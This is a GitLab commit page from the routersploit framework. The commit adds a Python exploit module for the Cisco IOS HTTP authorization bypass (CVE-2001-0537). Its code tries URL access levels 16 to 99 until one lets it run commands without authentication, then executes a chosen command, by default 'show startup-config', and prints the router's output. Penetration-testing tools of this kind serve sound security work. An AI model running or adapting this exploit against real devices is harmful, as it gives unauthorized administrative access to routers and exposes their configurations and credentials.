Skip to content
Projects
Groups
Snippets
Help
This project
Loading...
Sign in / Register
Toggle navigation
R
routersploit
Overview
Overview
Details
Activity
Cycle Analytics
Repository
Repository
Files
Commits
Branches
Tags
Contributors
Graph
Compare
Charts
Issues
0
Issues
0
List
Board
Labels
Milestones
Merge Requests
0
Merge Requests
0
CI / CD
CI / CD
Pipelines
Jobs
Schedules
Charts
Wiki
Wiki
Snippets
Snippets
Members
Members
Collapse sidebar
Close sidebar
Activity
Graph
Charts
Create a new issue
Jobs
Commits
Issue Boards
Open sidebar
czos-dpend
routersploit
Commits
db81c414
Commit
db81c414
authored
Apr 18, 2017
by
Marcin Bury
Committed by
GitHub
Apr 18, 2017
Browse files
Options
Browse Files
Download
Plain Diff
Merge pull request #232 from rstoikos/master
Cisco http ios authorization bypass
parents
d2ceead0
66b8c455
Show whitespace changes
Inline
Side-by-side
Showing
1 changed file
with
64 additions
and
0 deletions
+64
-0
cisco_ios_http_authorization_bypass.py
...les/exploits/cisco/cisco_ios_http_authorization_bypass.py
+64
-0
No files found.
routersploit/modules/exploits/cisco/cisco_ios_http_authorization_bypass.py
0 → 100644
View file @
db81c414
import
re
from
routersploit
import
(
exploits
,
print_success
,
print_error
,
print_info
,
http_request
,
mute
,
validators
,
)
class
Exploit
(
exploits
.
Exploit
):
"""
This exploit targets a vulnerability in the Cisco IOS HTTP Server.
By sending a GET request for the url "http://ip_address/level/{num}/exec/..",
it is possible to bypass authentication and execute any command.
Example: http://10.0.0.1/level/99/exec/show/startup/config
"""
__info__
=
{
'name'
:
'Cisco IOS HTTP Unauthorized Administrative Access'
,
'description'
:
'HTTP server for Cisco IOS 11.3 to 12.2 allows attackers '
'to bypass authentication and execute arbitrary commands, '
'when local authorization is being used, by specifying a high access level in the URL.'
,
'authors'
:
[
'Author'
,
'renos stoikos <rstoikos[at]gmail.com>'
# routesploit module
],
'references'
:
[
'http://www.cvedetails.com/cve/cve-2001-0537'
,
],
'devices'
:
[
' IOS 11.3 -> 12.2 are reportedly vulnerable.'
,
],
}
target
=
exploits
.
Option
(
''
,
'Target address e.g. http://192.168.1.1'
,
validators
=
validators
.
url
)
# target address
port
=
exploits
.
Option
(
80
,
'Target port'
)
# default port
show_command
=
exploits
.
Option
(
'show startup-config'
,
'Command to be executed e.g show startup-config'
)
access_level
=
None
@mute
def
check
(
self
):
for
num
in
range
(
16
,
100
):
url
=
"{}:{}/level/{}/exec/-/{}"
.
format
(
self
.
target
,
self
.
port
,
num
,
self
.
show_command
)
response
=
http_request
(
method
=
"GET"
,
url
=
url
)
if
response
.
status_code
==
200
and
"Command was: {}"
.
format
(
self
.
show_command
)
in
response
.
text
:
self
.
access_level
=
num
return
True
# target is vulnerable
return
False
# target is not vulnerable
def
run
(
self
):
if
self
.
check
():
print_success
(
"Target is vulnerable"
)
url
=
"{}:{}/level/{}/exec/-/{}"
.
format
(
self
.
target
,
self
.
port
,
self
.
access_level
,
self
.
show_command
)
response
=
http_request
(
method
=
"GET"
,
url
=
url
)
if
response
is
None
:
print_error
(
"Could not execute command"
)
# target is not vulnerable
return
else
:
print_success
(
"Exploit success! - executing command"
)
print_info
(
re
.
sub
(
'<[^<]+?>'
,
''
,
response
.
text
))
else
:
print_error
(
"Exploit failed - target seems to be not vulnerable"
)
Write
Preview
Markdown
is supported
0%
Try again
or
attach a new file
Attach a file
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Cancel
Please
register
or
sign in
to comment